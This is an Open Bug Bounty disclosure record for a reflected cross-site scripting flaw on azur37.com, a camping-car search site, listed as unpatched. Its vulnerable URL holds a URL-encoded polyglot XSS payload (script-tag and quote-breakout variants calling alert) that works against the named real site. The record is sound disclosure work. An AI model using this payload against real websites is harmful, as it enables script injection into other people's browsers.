azur37.com XSS vulnerability

2016-06-22T09:43:00
ID OBB:160740
Type openbugbounty
Reporter XSSbot
Modified 2016-06-29T15:12:00

Description

Vulnerable URL:
http://www.azur37.com/recherche-camping-car/?neuf_/_occasion=%5B%27%27%5D&type;=%5B%27%27%5D&prix;=%5B%27prix%20inf%5Cxc3%5Cxa9rieur%20%5Cxc3%5Cxa0%27%5D&marque;=%5B%27%27%5D%27%3Balert%28String.fromCharCode%2879%2C80%2C69%2C78%2C66%2C85%2C71%2C66%2C79%2C85%2C78%2C84%2C89%29%29%2F%2F%27%3Balert%28String.%20fromCharCode%2879%2C80%2C69%2C78%2C66%2C85%2C71%2C66%2C79%2C85%2C78%2C84%2C89%29%29%2F%2F%22%3Balert%28String.fromCharCode%20%2879%2C80%2C69%2C78%2C66%2C85%2C71%2C66%2C79%2C85%2C78%2C84%2C89%29%29%2F%2F%22%3Balert%28String.fromCharCode%2879%2C80%2C69%2C78%2C66%2C85%2C71%2C66%2C79%2C85%2C78%2C84%2C89%29%29%2F%2F--%20%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2879%2C80%2C69%2C78%2C66%2C85%2C71%2C66%2C79%2C85%2C78%2C84%2C89%29%29%20%3C%2FSCRIPT%3E
Details:

Description| Value
---|---
Patched:| No
Latest check for patch:| 30.07.2017
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 2265408
VIP website status:| No
Check azur37.com SSL connection:| (Grade: F)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 22 June, 2016 09:43 GMT
Vulnerability existence verified and confirmed| 22 June, 2016 15:05 GMT
Notification sent to subscribers (without technical details)| 22 June, 2016 18:17 GMT
Vulnerability details disclosed by researcher| 29 June, 2016 15:12 GMT